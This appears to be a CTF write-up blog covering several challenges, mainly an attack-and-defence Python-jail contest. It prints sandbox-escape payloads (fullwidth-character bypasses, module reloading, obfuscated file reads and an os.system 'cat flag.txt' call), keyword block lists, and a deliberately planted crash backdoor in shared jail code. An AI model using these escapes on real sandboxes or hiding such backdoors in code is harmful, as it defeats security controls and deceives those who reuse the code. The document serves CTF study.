  function w(ps1, n2_1_1, pq1) {
    if (n2_1_1 === 0) return 0x1n
    return n2_1_1 % 2 === 0 ? w((ps1 * ps1) % pq1, n2_1_1 / 2, pq1) : (ps1 * w(ps1, n2_1_1 - 1, pq1)) % pq1
  }

有人丟到 ChatGPT 就知道是快速冪 Orz

flag ACSC{warmup_challenge_so_easy}

ngo

賽中沒解出來，程式本身主動解密送 flag，逆完會發現有個解密迴圈次數是指數成長，導致解密程式跑不完，迴圈內在計算這個 a

a = a >> 1 ^ -(a & 1) & a

感覺像 LFSR ，但忘記 LFSR  state 有循環的特性 (f^n)(a) == a 可以加速運算，當時猜測 a 有循環，熬夜昏頭把範圍設 10000 而已就找不到循環 QQ。正規解是 (2**32 - 1) 會循環。

Hardware

Hardware is not so hard

一道分析 sd card SPI mode traffic 題目，最麻煩的點是找到 spec

http://ccy.dd.ncu.edu.tw/~chen/rd/SIOC/SD Card驅動程式開發2.pdf

http://chlazza.nfshost.com/sdcardinfo.html

依照 spec parse，把讀取資料照順序寫成一張圖片即可

import binascii
blocks = [0 for i in range(64)]
i = 0
with open("spi.txt", "r") as f, open("out.jpg", "wb") as outfile:
    for l in f.readlines():
        if "SD Card to Device : ff" in l:
            l = l[l.find("fe") + 2 : -5]
            print(len(l))
            data = binascii.unhexlify(l)
            blocks[i] = data
        elif "Device to SD Card : 51" in l:
            l = l[28:30]
            i = int(l, 16)
    for block in blocks:
        outfile.write(block)
# ACSC{1tW@sE@syW@snt1t}

題目介紹

source code

這題是 A&D，每輪 5 分鐘，每輪裡會計算成功攻擊幾組的 pyjail 還有被攻擊次數，然後透過某個公式計算該輪得分，最終題目的分數是加總每輪得分後和其他組別做 normalize。

攻擊方的目標是執行一段不限長度 python code 來讀取 ./flag.txt 後提交 flag；防禦方的目標是讓無害的 example code 能通過 jail，讓 exploit code 無法通過 jail 或是通過 jail 後讀取不到 ./flag.txt 。這個 jail 執行環境和 exploit code 執行環境是隔離的，jail 執行環境無任何限制，但是要求被過濾的 exploit code 的長度變動 < 75 abs((len(original) - len(modified)) <= 75 ，超過的話會執行 original ，另外如果 jail 因為某些原因 crash 的話也會執行 original 。 ./flag.txt 在幾 round 後已經變成 readonly 。

主辦方會在大約六輪多公佈 jail code，但不公佈 exploit code，並且執行環境都是無連網，因此沒有辦法知道 exploit code 長怎麼樣。

題目本質

對攻擊方來說，無限制攻擊次數和 code 長度，且 exploit code 從頭到尾都對防禦方是不可見的，因此只要用最強的 exploit code 即可。

反過來說防禦方因為在多輪後會被公布 jail code，在策略上要考量的就很多，首先是別人可以在幾輪後直接 copy paste 你的 jail，所以要能打穿自己的 jail；第二點是 jail code 可能會洩漏攻擊方法給別人，讓別人從 unknown unknown 變成 known unknown，也許餵給 ChatGPT 就能繞過(?)；第三點是要能盡可能的減少 exploit code 能獲得的資訊，因為 exploit code 會回傳 stderr，所以透過修改 code 導致 stderr 可以讓攻擊方在當輪就做出反應，而直接拒絕執行的話則可以使 jail 的價值持續至少六輪。

jail 繞法

過濾關鍵字

最基本的方法，前幾輪幾乎都是這種。常見的繞法像是字串拼接、編碼等等。

進階版過濾關鍵字

再過幾輪後，有隊伍(有 dalun 那隊)想到既然解碼後都會有 flag.txt ，那乾脆在 opcode 層級做過濾

    import dis
    for inst in dis.get_instructions(code):
        if inst.opcode == 100:
            if 'flag.txt' in str(inst.argval) or 'system' in str(inst.argval) or 'io' in str(inst.argval) or 'spawn' in str(inst.argval) or 'subprocess' in str(inst.argval) or 'pickle' in str(inst.argval) or 'getattr' in str(inst.argval) or 'base64' in str(inst.argval) or 'rot' in str(inst.argval) or 'open' in str(inst.argval) or 'read' in str(inst.argval) or 'write' in str(inst.argval) or 'sys' in str(inst.argval) or 'eval' in str(inst.argval) or 'exec' in str(inst.argval) or 'cat' in str(inst.argval) or 'builtins' in str(inst.argval):
                return False, "f2"

這個想法本身很有用，因為很多常規 jail 方法都會卡在變更長度 < 75 導致失效，但在 jail code 執行時不會有長度限制，可惜最後大多隊伍只有去檢查 opcode 100 LOAD_CONST 指令，雖然 opcode 自身優化後會讓字串串接合併成同一個字串 'a'+'b' --> LOAD_CONST 'ab' ，讓字串串接失效，然而經過一些操作後再串接就不會被優化，這裡用 'galf'[::-1]+'.txt' 就能繞過

module 無法透過中括號取得 attribute，也就無法字串拼接

>>> import os
>>> os['system']
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: 'module' object is not subscriptable

此時可以透過 getattr 幫忙來字串拼接 getattr(os,'sys'+'tem')

還有看到很多隊伍禁止 base64, reversed 之類字串 encode 方法，但是最簡單的 [::-1]  搭配拼接就都繞過了

未知版過濾關鍵字

慢慢繞實在太麻煩，後來都直接透過全形繞過，直到比賽結束前都沒有其他隊伍對全形繞過釋出 patch 的樣子，讓我一直不知道該不該上全形繞過的 patch

code = "".join(map(lambda x: chr(ord(x) - 65248) if ord(x) > 65248 else x, code))

全形繞過原理是 python 執行時會很貼心的把全形字母當作半形字母，但是字串比對時全形和半形是不同的

>>> 'ｅｘｅｃ' != 'exec'
True
>>> ｅｘｅｃ('print(7122)')
7122

第一次知道這個技巧是 🍁 某次 CTF 用來繞黑名單，雖然是個古老繞法，但幾乎每個第一次寫 python 黑名單過濾的人都會踩到這個坑 :D

沙盒

忘記哪隊在第一天很有創意的在 jail code 刻出沙盒，並透過 output 有沒有假 flag 來判斷是否是 exploit code

    os.system("mkdir /tmp/dir")
    os.chdir("/tmp/dir")
    F = open("flag.txt", "w")
    F.write("EOFmfl183p3ph4hmrmsb32ca1108sqr7")
    F.close()
    F = open("code.py", "w")
    F.write(code)
    F.close()
    os.system("python code.py > out.txt")
    F = open("out.txt", "r")
    s = F.read()
    F.close()
    f = re.findall(r"EOFmfl183p3ph4hmrmsb32ca1108sqr7", s)
    if len(f) > 0:
        return False, code

這在釋出 jail code 後才好繞，只要把 output 編碼即可

進一步想可以在這裡解決 len < 75 這件事，因此能加上常規的 syscall 檢測等等

覆蓋危險函數

在第一天後半段開始，終於有 CTF 常規的 python jail 出現，我想可能是限制變動 75 這規則讓很多隊伍不把濃縮 python jail 當首選

    code = (
        "import os,importlib\nos.popen=os.system=os.exec=os.read=importlib.reload=0\n"
        + code
    )
    return True, code  # line:20

到第二天出現官方正規解 PEP 578 – Python Runtime Audit Hooks

    code = "import sys;sys.addaudithook(lambda*t:exit()if'g.t'in str(t)else 0)\n" + code
    return True, code

第一種的繞法就是想辦法 reload module 或是找到沒被覆蓋的值，畢竟只能塞 75 char，剩下只能靠 jail code 做過濾。

第一天時隊友 Entroy 先找到 importlib.reload 做 reload，繞過一段時間後 pyjail 就修補了，大家對繞 pyjail 不熟，又自己隊伍的 jail 還在全裸修補中，沒時間找新的攻擊手法，第一天快結束時 Entory 問了 ChatGPT 繞法，得到

試了一下還真的可以，隔天就用在 exploit code 了。偉哉 ChatGPT

晚上研究一下繞法，學到幾招，直到第二天結束時都還能通殺

reload modules 找回被刪除的 attribute

import ｓubprocess
import ｏｓ
from ｓｙｓ import modules as q

try:
    del q["o" + "s"]
    del q["sub" + "pro" + "cess"]
except:
    pass
import ｓubprocess
import ｏｓ

繞過 open=0

import ｂｕｉｌｔｉｎｓ
print(
    getａttr(getａttr(builtins, "po"[::-1] + "en")("galf"[::-1] + ".txt"), "re" + "ad")()[
        ::-1
    ]
)

>>> open = 0
>>> import builtins
>>> builtins.open
<built-in function open>
>>> __builtins__
<module 'builtins' (built-in)>
>>> __builtins__.open
<built-in function open>

繞過 import 類型的字串比對 e.g. import builtins

__import__("so"[::-1]).ｓｙｓtem(" tac"[::-1] + "fl" + "ga"[::-1] + ".t" + "tx"[::-1])

第二天從別人 jail 學到可以透過 pickle, marshal 來載入( jail code 洩漏攻擊法的案例)，不過後來沒實作

    x = dict()
    exec(marshal.loads(b"\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x40\x00\x00\x00\x73\x2a\x00\x00\x00\x64\x00\x64\x01\x6c\x00\x6d\x01\x5a\x01\x01\x00\x64\x02\x65\x02\x64\x03\x65\x01\x65\x03\x65\x02\x66\x02\x19\x00\x66\x04\x64\x04\x64\x05\x84\x04\x5a\x04\x64\x06\x53\x00\x29\x07\xe9\x00\x00\x00\x00\x29\x01\xda\x05\x54\x75\x70\x6c\x65\xda\x04\x63\x6f\x64\x65\xda\x06\x72\x65\x74\x75\x72\x6e\x63\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00\x43\x00\x00\x00\x73\x52\x01\x00\x00\x64\x01\x64\x00\x6c\x00\x7d\x01\x67\x00\x64\x02\xa2\x01\x7d\x02\x64\x03\x64\x04\x67\x02\x7d\x03\x64\x05\x64\x06\x84\x00\x7c\x01\xa0\x01\x7c\x00\xa1\x01\x44\x00\x83\x01\x7d\x04\x74\x02\x74\x03\x7c\x04\x83\x01\x83\x01\x44\x00\x5d\x5c\x7d\x05\x7c\x04\x7c\x05\x19\x00\x7d\x06\x7c\x06\x6a\x04\x64\x07\x6b\x02\x72\x31\x74\x05\x7c\x06\x6a\x06\x83\x01\x64\x08\x6b\x02\x72\x31\x01\x00\x64\x09\x53\x00\x7c\x06\x6a\x04\x64\x0a\x6b\x02\x72\x40\x64\x0b\x74\x05\x7c\x06\x6a\x06\x83\x01\x6b\x02\x72\x40\x01\x00\x64\x09\x53\x00\x7c\x06\x6a\x04\x64\x0c\x6b\x02\x72\x4f\x64\x0d\x74\x05\x7c\x06\x6a\x06\x83\x01\x76\x00\x72\x4f\x01\x00\x64\x09\x53\x00\x7c\x06\x6a\x04\x64\x0e\x6b\x02\x72\x5e\x74\x05\x7c\x06\x6a\x06\x83\x01\x7c\x02\x76\x00\x72\x5e\x01\x00\x64\x09\x53\x00\x7c\x06\x6a\x04\x64\x0e\x6b\x02\x72\x78\x74\x05\x7c\x06\x6a\x06\x83\x01\x64\x0f\x6b\x02\x72\x78\x74\x05\x7c\x04\x7c\x05\x64\x10\x17\x00\x19\x00\x6a\x06\x83\x01\x7c\x03\x76\x00\x72\x78\x01\x00\x64\x09\x53\x00\x71\x1c\x64\x11\x7c\x00\x76\x00\x72\x83\x7c\x00\xa0\x07\x64\x12\x64\x13\xa1\x02\x7d\x00\x64\x14\x7c\x00\x76\x00\x72\x8d\x7c\x00\xa0\x07\x64\x15\x64\x13\xa1\x02\x7d\x00\x64\x16\x7c\x00\x76\x00\x72\x97\x7c\x00\xa0\x07\x64\x17\x64\x13\xa1\x02\x7d\x00\x64\x18\x7c\x00\x76\x00\x72\xa1\x7c\x00\xa0\x07\x64\x19\x64\x13\xa1\x02\x7d\x00\x64\x1a\x7c\x00\x17\x00\x7d\x00\x64\x1b\x7c\x00\x66\x02\x53\x00\x29\x1c\x4e\x72\x01\x00\x00\x00\x29\x03\xda\x09\x69\x6d\x70\x6f\x72\x74\x6c\x69\x62\xda\x06\x62\x61\x73\x65\x36\x34\xda\x06\x70\x69\x63\x6b\x6c\x65\xda\x06\x73\x79\x73\x74\x65\x6d\xda\x05\x70\x6f\x70\x65\x6e\x63\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x53\x00\x00\x00\x73\x10\x00\x00\x00\x67\x00\x7c\x00\x5d\x04\x7d\x01\x7c\x01\x91\x02\x71\x02\x53\x00\xa9\x00\x72\x0a\x00\x00\x00\x29\x02\xda\x02\x2e\x30\xda\x01\x78\x72\x0a\x00\x00\x00\x72\x0a\x00\x00\x00\xfa\x08\x62\x6c\x6f\x63\x6b\x2e\x70\x79\xda\x0a\x3c\x6c\x69\x73\x74\x63\x6f\x6d\x70\x3e\x0a\x00\x00\x00\x73\x02\x00\x00\x00\x10\x00\x7a\x18\x6a\x61\x69\x6c\x2e\x3c\x6c\x6f\x63\x61\x6c\x73\x3e\x2e\x3c\x6c\x69\x73\x74\x63\x6f\x6d\x70\x3e\xe9\x65\x00\x00\x00\xda\x0c\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f\x29\x02\x46\xda\x00\xe9\xa0\x00\x00\x00\xda\x04\x72\x65\x61\x64\xe9\x64\x00\x00\x00\x7a\x08\x66\x6c\x61\x67\x2e\x74\x78\x74\xe9\x6c\x00\x00\x00\xda\x02\x6f\x73\xe9\x01\x00\x00\x00\x7a\x05\x72\x65\x61\x64\x28\x7a\x06\x72\x65\x61\x64\x28\x29\x7a\x07\x63\x6c\x6f\x73\x65\x28\x29\x7a\x09\x72\x65\x61\x64\x6c\x69\x6e\x65\x28\x7a\x0a\x72\x65\x61\x64\x6c\x69\x6e\x65\x28\x29\x7a\x0a\x72\x65\x61\x64\x6c\x69\x6e\x65\x73\x28\x7a\x0b\x72\x65\x61\x64\x6c\x69\x6e\x65\x73\x28\x29\x7a\x09\x74\x72\x75\x6e\x63\x61\x74\x65\x28\x7a\x0a\x74\x72\x75\x6e\x63\x61\x74\x65\x28\x29\x61\x49\x04\x00\x00\x69\x6d\x70\x6f\x72\x74\x20\x6f\x73\x2c\x69\x6d\x70\x6f\x72\x74\x6c\x69\x62\x3b\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x3d\x6f\x73\x2e\x73\x79\x73\x74\x65\x6d\x3d\x6f\x73\x2e\x65\x78\x65\x63\x3d\x6f\x73\x2e\x72\x65\x61\x64\x3d\x69\x6d\x70\x6f\x72\x74\x6c\x69\x62\x2e\x72\x65\x6c\x6f\x61\x64\x3d\x30\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x0a\x54\x29\x08\xda\x03\x64\x69\x73\x5a\x10\x67\x65\x74\x5f\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\xda\x05\x72\x61\x6e\x67\x65\xda\x03\x6c\x65\x6e\x5a\x06\x6f\x70\x63\x6f\x64\x65\xda\x03\x73\x74\x72\x5a\x06\x61\x72\x67\x76\x61\x6c\xda\x07\x72\x65\x70\x6c\x61\x63\x65\x29\x07\x72\x03\x00\x00\x00\x72\x18\x00\x00\x00\x5a\x0a\x62\x61\x6e\x5f\x69\x6d\x70\x6f\x72\x74\x5a\x0d\x62\x61\x6e\x5f\x6f\x73\x5f\x6d\x65\x74\x68\x6f\x64\x5a\x05\x63\x6f\x64\x65\x73\xda\x01\x69\x72\x0c\x00\x00\x00\x72\x0a\x00\x00\x00\x72\x0a\x00\x00\x00\x72\x0d\x00\x00\x00\xda\x04\x6a\x61\x69\x6c\x03\x00\x00\x00\x73\x38\x00\x00\x00\x08\x02\x08\x02\x08\x01\x14\x02\x10\x02\x08\x01\x18\x01\x06\x01\x18\x01\x06\x01\x18\x01\x06\x01\x18\x01\x06\x01\x18\x01\x16\x01\x06\x01\x02\x80\x08\x02\x0c\x01\x08\x01\x0c\x01\x08\x01\x0c\x01\x08\x01\x0c\x01\x08\x02\x08\x02\x72\x1e\x00\x00\x00\x4e\x29\x05\xda\x06\x74\x79\x70\x69\x6e\x67\x72\x02\x00\x00\x00\x72\x1b\x00\x00\x00\xda\x04\x62\x6f\x6f\x6c\x72\x1e\x00\x00\x00\x72\x0a\x00\x00\x00\x72\x0a\x00\x00\x00\x72\x0a\x00\x00\x00\x72\x0d\x00\x00\x00\xda\x08\x3c\x6d\x6f\x64\x75\x6c\x65\x3e\x01\x00\x00\x00\x73\x04\x00\x00\x00\x0c\x00\x1e\x02"), x)
    x, code = x['jail'](code)

不得不提到這真是混淆 jail code 的好方法，讓我完全不敢 copy paste 來路不明的 jail code。

第二種官方解賽中有人使用但完整，我沒搞清楚原理就繞過了，之後補一下 ->TODO<-

jail 本質?

這段可以跳過，讀完不會學到任何技術

以我一個從不會繞 pyjail 也不會寫 pyjail 辜狗一個晚上找前幾筆就找到前面各種花式繞法，並且直到比賽結束都能通殺，讓我重新思考這 jail 的本質，在晚上測試機器 loading 比較小的時候驗證了這個想法

jail code patching 時的 example code 是固定的

並且依據主辦方有提供 NAS 那題的 service check，卻沒有 pyjail 的 service check 結果，又 infra 已經承受不住大家的摧殘，可以猜測通過 patching 後不會再有其他的驗證，因此 jail 的簡單又有效的做法顯然是

如何區分 exploit code 和  example code?

於是不眠不休的想出一堆噁心人的 jail，請各位欣賞

首先是測試 example code 的 input 長度，會介於 <70 和 >800，小部分 example code 會是人工產出，大多數會是從網路上抓的，這樣人工產的會很短，網路上產的則會很長，在晚上稍微測試一下大小就生出這條

大多是🍁的 code

    if len(code) < 800 and len(code) > 70:
        return False, ""

既然有沙箱，那順便測試 output 長度

    x = len(s)
    if (
        x < 700
        and x**6
        - 1134 * x**5
        + 384209 * x**4
        - 54402048 * x**3
        + 3365938800 * x**2
        - 73802147328 * x
        != 0
    ):
        return True, "print('EOFmsb32ca1108sqr7mfl183p3ph4hmr'),exit(1)\n" + code

在第二天比賽時想到，example code 的亂度應該比起 exploit code 都蠻大的，簡單點的實作是測試使用到的字母集，到最後十幾輪上這個 patch，最終只有 team 1 打穿

    if len(set(code)) < 55:
        return False, ""

每個 patch 都簡單暴力，卻直到 jail code 公開前都不可能知道如何繞

賽後想了一下主辦方如何避免這種旁門左道又要兼顧 server 效能，先排除動態生成 example code。想到比較好的方法是把 example code 切成兩部分，一部份用在 patching 時，另一部份則可以每輪動態生成或是先生好 170 份(有 170 輪)，每輪 service check 每隊 jail 執行並比對 output，下一輪公布 service check 結果和該 example code 來讓各隊可以調整 jail。

其他防守方技巧

前面有提到防守方有三個考量點

盡可能減少 exploit code 透漏資訊

題目有提到其他的像是 example code 不會執行系統指令、不會讀寫檔等等，有這些嘗試都直接禁止執行。

這某種程度也意味者區分 exploit code 和 example code

防止 jail code 透漏資訊

要即時監控各隊的攻防情況，如果攻防相減後自己仍然在前幾或是其它隊伍還沒使用相關的 patch 就不必上 patch。雖然講是這樣講，但是覺得全上比較好玩，在中後段就把所有留著的 patch 全上了，然後就被打爆 :D

即使 exploit code 是未知的，透過即時監控各隊攻防情況，仍然可以有效修補自己的 jail。若被某隊打穿時可以從他們的 jail code 猜測他們用了什麼新攻擊；若被某隊打穿時，可以把他們打不穿的 jail 加進自己的 jail；若打不穿某隊時，可以從被打穿數量判斷他們的 jail 難度決定要不要耗費時間改寫 exploit ....有三隊後來都直接 copy paste 我的 jail code，在後幾輪被打數量 < 5...

蠻意外的是大多數隊伍都沒在 copy paste 別人的 jail ，不太懂原因:D

別人可以直接 copy paste jail

這部分的解法就很發散，我有研究能不能塞些特殊符號讓他 copy paste 時 panel 爛掉，沒找到好辦法；寫一個本地測試程式確保上新 patch 時自己的 exploit code 能通過；最後是夾帶 backdoor

先提一下我原本想說混淆沒屁用，後來才想到如果意識到可能有 backdoor，混淆就能嚇阻別人 copy ，不過這場比賽幾乎沒有隊伍有意識到 backdoor 這件事

backdoor 充分利用了題目的判斷邏輯，前面提到題目有兩個情況下會直接放行 1. 長度變動 > 75 2. jail code crash

長度變動 > 75

在很早我就注意到有些人的 jail code 寫法是有問題的，像是常見的 replace

    banlist = ['flag.txt', 'open', 'write', 'read', '__builtins__', 'sys', 'system', 'eval', 'exec', 'pty',
               'getattr', '__dict__', 'base64', 'rot', 'get', 'subclass', 'dis', 'inspect', 'spawn', 'subprocess', 'dumps', 'loads',
               'codecs', 'FileIO', 'timeit', 'commands', 'seek', 'cgi', 'compile', 'builtins']
    for word in banlist:
        code = code.replace(word, 'len')

攻擊者只要重複塞這些字眼，讓最終長度變化超過 75 就使得 jail 失效。不過題目的判斷有點奇怪，根據後來釋出的題目原始碼

def apply_jail(jail: str, code: str) -> bool:
    try:
        r = run(JAIL_TEMPLATE.format(jail), stdin=code)
        allow, new_code = json.loads(r.stdout.strip())
        if len(new_code) > len(code) + MAX_MORE_CODE:
            return True, code
        return allow, new_code
    except:
        # allow by default
        return True, code

應該要增減 75 吧(?
大多數隊伍後來都把替換字眼更換成 len ，因此只有當關鍵字是 os 時才有辦法利用

埋後門方法就很簡單，讓一堆替換字串是等長的，讓某幾個替換多一或減一即可，沒人那麼閒一個一個測長度。

jail code crash

這想法是前面幾版 patch 上爛，crash 直接通過 patching，導致我們隊被打爆，後來自己寫本地端測試程式特別偵測這塊，然後在小隊討論怎麼埋 backdoor 時 Entroy 就想到可以這樣玩:D

backdoor 在這

    if "readlines(" in code:  # line:15
        code = code.replace("readlines()", "re@dline5()")  # line:16
    if "importIib" in code:  # line:15
        code = re["replace"]("importlib()", "")  # line:16
    if "truncate(" in code:  # line:17
        code = code.replace("try#cate()", "trunc@te()")  # line:18

眼尖一點可能會看到 importIib 打錯了，真正的問題是在 re["replace"] ，沒辦法這樣存取 module attribute，會直接 throw exception 導致 crash。

最後那些 copy paste 的隊伍都沒有拔掉這個 backdoor :D

有一個想到但沒試的 ReDos backdoor，要愛護 server。

結語

其實🍁 splitline (應該是ㄅ，那麼惡趣味)把 87% 繞過技巧提示都放在 random_math.py，那個一開始就給唯一公開的那份 example code。

我還是不會繞正規 python jail，得研究一下 QQ

Balsn get the 16th place at the end.

I solved some web challenges with my idol ginoah. The challenges are awesome!

web

skipinx

This challenge is solved by teamate Peter Cheng . I reviewed it after the contest.

There is an nginx before the express.js server, and it pass non-urldecoded query string to the express.js server.

  location / {
    set $args "${args}&proxy=nginx";
    proxy_pass http://web:3000;
  }

The web server will return flag only if  req.query.proxy not include nginx

  req.query.proxy.includes('nginx')
    ? res.status(400).send('Access here directly, not via nginx :(')
    : res.send(`Congratz! You got a flag: ${FLAG}`)

According to code found by Peter Cheng, the qs module, which express.js parse query string with, will only deal with first 1000 parameters, and the remain query string is ignored in req.query. Thus, we can pass a query string with more than 1000 parameters, and the last part proxy=nginx keep unparsed.

